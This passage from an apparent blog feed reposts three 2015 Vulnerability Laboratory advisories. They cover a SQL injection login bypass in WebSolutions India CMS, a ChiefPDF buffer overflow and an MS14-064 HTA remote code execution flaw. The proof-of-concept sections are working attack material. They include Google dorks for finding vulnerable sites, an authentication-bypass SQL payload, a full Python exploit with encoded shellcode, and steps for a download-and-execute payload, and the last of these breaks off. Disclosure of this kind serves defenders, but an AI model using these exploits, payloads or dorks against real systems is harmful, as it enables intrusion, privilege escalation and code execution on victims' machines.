authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH ™
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] WebSolutions India Design CMS - SQL Injection Vulnerability
Document Title: =============== WebSolutions India Design CMS - SQL Injection Vulnerability References (Source): ==================== http://ift.tt/1TVeUWO Release Date: ============= 2015-08-20 Vulnerability Laboratory ID (VL-ID): ==================================== 1577 Common Vulnerability Scoring System: ==================================== 8.7 Product & Service Introduction: =============================== Award winning website design and mobile application development company in India. Day by day, the number of devices, platforms, and browsers that need to work with your site grows. Responsive web design represents a fundamental shift in how we`ll build websites for the decade to come. With Responsive Design, your website`s layout is fluid. Regardless of whether the visitor is browsing on a desktop computer, tablet or smart phone, a responsive website will arrange its content seamlessly to fit the user`s device. (Copy of the Vendor Homepage: http://ift.tt/1J7pkrS ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a high severity remote sql injection web vulnerability in the WebSolutions India Design CMS 2015Q3. Vulnerability Disclosure Timeline: ================================== 2015-08-20: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== WebSolutions India Product: WebSolutions - Design Content Management System 2015 Q3 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A remote sql injection web vulnerability has been discovered in the WebSolutions India Design CMS 2015Q3. The vulnerability allows remote attackers to execute own sql commands to compromise the web-applicaation or database management system. The vulnerability is located in the `username` and `password` input field values of the `login` module. Remote attackers are able to execute own sql commands by manipulation of the GET method request with the vulnerable username and password parameter. The request method to inject the sql command is GET and the issue is located on the application-side of the online-service. The sql vulnerability allows an attacker to remotly gain unauthorized access to the account system of the content management system. The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.7. Exploitation of the remote sql injection web vulnerability requires no user interaction or privilege web-application user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. Request Method(s): [+] GET Vulnerable Module(s): [+] Login Vulnerable Parameter(s): [+] username [+] password Proof of Concept (PoC): ======================= The remote sql injection web vulnerability can be exploited by remote attackers without privilege web-application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Google Dork(s): intext:Designed by: Web Design Company Amritsar intext:Designed by: Websolutions India Admin Page: http://ift.tt/1E6ShY8 PoC: Login (username & password) '=''or' and 1=1'- Security Risk: ============== The security risk of the remote sql injection web vulnerability in the content management system login is estimated as high. (CVSS 8.7) Credits & Authors: ================== wild.soldier(behrouz mansoori) - Danger Security Team SPT: Nima Danger , Mehran_FLash and all Members ... Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] ChiefPDF Software v2.x - Buffer Overflow Vulnerability
Document Title: =============== ChiefPDF Software v2.x - Buffer Overflow Vulnerability References (Source): ==================== http://ift.tt/1gYp7j8 Release Date: ============= 2015-08-20 Vulnerability Laboratory ID (VL-ID): ==================================== 1578 Common Vulnerability Scoring System: ==================================== 7.3 Product & Service Introduction: =============================== High Volume Batch OCR Conversion. High Performance TIFF to PDF OCR. High-Volume Tiff To PDF Conversions. Find Out How Easy it Can Be! Convert scanned documents & images. Searchable PDF. (Copy of the Vendor Homepage: http://www.chiefpdf.com & http://ift.tt/1NnrI3V) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a local buffer overflow vulnerability in the official ChiefPDF Software Clients v2.0. Vulnerability Disclosure Timeline: ================================== 2015-08-20: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== ChiefPDF Software Product: PDF to Image Converter PDF to Image Converter Free, PDF to Tiff Converter & PDF 2.0 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A local buffer overflow vulnerability has been discovered in the official ChiefPDF Software Clients v2.0. The buffer overflow vulnerability can be exploited by local attackers to compromise a target system or to gain higher access privileges for further exploitation. The buffer overflow vulnerability is located in the `Registration - License Name` input field of the software client. The issue is a classic unicode buffer overflow vulnerability that allows an attacker to compromise the local system. The vulnerability can be exploited in all software clients like the PDF to Image Converter 2.0, PDF to Image Converter Free 2.0, PDF to Tiff Converter 2.0 and PDF to Tiff Converter Free 2.0. The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.3. Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the vulnerability results in system compromise by elevation of privileges via overwrite of the registers. Vulnerable Module(s): [+] Registration - License Name Vulnerable Program(s): [+] PDF to Image Converter 2.0 [+] PDF to Image Converter Free 2.0 [+] PDF to Tiff Converter 2.0 [+] PDF to Tiff Converter Free 2.0 Proof of Concept (PoC): ======================= The local buffer overflow vulnerability can be exploited by local attackers with restricted system user account without user interaction. For security demonstration or to reproduce follow the provided information and steps below to continue. PoC: ChiefPDF.py #!/usr/bin/python #Exploit Title:ChiefPDF Software Buffer Overflow #vulnerable programs: #PDF to Image Converter 2.0 #PDF to Image Converter Free 2.0 #PDF to Tiff Converter 2.0 #PDF to Tiff Converter Free 2.0 #Software Link:http://ift.tt/1NnrI3V #Author: metacom - twitter.com/m3tac0m #Tested on: Win-Xp-sp3, Win-7, Win-8.1 #How to use: Copy the AAAA...+ string from regkey.txt and paste -> Registration - License Name: (input) buffer="A" * 544 buffer+="\xeb\x06\x90\x90" buffer+="\x8B\x89\x03\x10"# 1003898B 5E POP ESI buffer+="\x90" * 80 buffer+=("\xba\x50\x3e\xf5\xa5\xda\xd7\xd9\x74\x24\xf4\x5b\x31\xc9\xb1" "\x33\x83\xc3\x04\x31\x53\x0e\x03\x03\x30\x17\x50\x5f\xa4\x5e" "\x9b\x9f\x35\x01\x15\x7a\x04\x13\x41\x0f\x35\xa3\x01\x5d\xb6" "\x48\x47\x75\x4d\x3c\x40\x7a\xe6\x8b\xb6\xb5\xf7\x3d\x77\x19" "\x3b\x5f\x0b\x63\x68\xbf\x32\xac\x7d\xbe\x73\xd0\x8e\x92\x2c" "\x9f\x3d\x03\x58\xdd\xfd\x22\x8e\x6a\xbd\x5c\xab\xac\x4a\xd7" "\xb2\xfc\xe3\x6c\xfc\xe4\x88\x2b\xdd\x15\x5c\x28\x21\x5c\xe9" "\x9b\xd1\x5f\x3b\xd2\x1a\x6e\x03\xb9\x24\x5f\x8e\xc3\x61\x67" "\x71\xb6\x99\x94\x0c\xc1\x59\xe7\xca\x44\x7c\x4f\x98\xff\xa4" "\x6e\x4d\x99\x2f\x7c\x3a\xed\x68\x60\xbd\x22\x03\x9c\x36\xc5" "\xc4\x15\x0c\xe2\xc0\x7e\xd6\x8b\x51\xda\xb9\xb4\x82\x82\x66" "\x11\xc8\x20\x72\x23\x93\x2e\x85\xa1\xa9\x17\x85\xb9\xb1\x37" "\xee\x88\x3a\xd8\x69\x15\xe9\x9d\x86\x5f\xb0\xb7\x0e\x06\x20" "\x8a\x52\xb9\x9e\xc8\x6a\x3a\x2b\xb0\x88\x22\x5e\xb5\xd5\xe4" "\xb2\xc7\x46\x81\xb4\x74\x66\x80\xd6\x1b\xf4\x48\x37\xbe\x7c" "\xea\x47") file = open('regkey.txt','wb') file.write(buffer); file.close() Security Risk: ============== The security risk of the local buffer overflow vulnerability in the chiefpdf software clients is estimated as high. (CVSS 7.3) Credits & Authors: ================== metacom - [http://ift.tt/1ROW2Et] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] Microsoft HTA (HTML Application) - Remote Code Execution Vulnerability (MS14-064)
Document Title: =============== Microsoft HTA (HTML Application) - Remote Code Execution Vulnerability (MS14-064) References (Source): ==================== http://ift.tt/1TVatLt Video: http://youtu.be/Vkswz7vt23M http://ift.tt/1sAsDia CVE-ID: ======= CVE-2014-6332 Release Date: ============= 2015-08-15 Vulnerability Laboratory ID (VL-ID): ==================================== 1576 Common Vulnerability Scoring System: ==================================== 9.3 Abstract Advisory Information: ============================== The Vulnerability Laboratory discovered remote code execution vulnerability in the Microsoft HTA (HTML Application) - MS14-064. Vulnerability Disclosure Timeline: ================================== 2015-08-15: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka Windows OLE Automation Array Remote Code Execution Vulnerability. Proof of Concept (PoC): ======================= The vulnerbility can be exploited by remote attackers without user interaction or privilege application user accounts. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce ... 1 . Run php code : php hta.php 2 . Copy this php output (HTML) and Paste as poc.hta (Replace ip) 3 . Open poc.hta 4 . Your Link Download/Execute on your target 5 . Finished ;) #!/usr/bin/php poc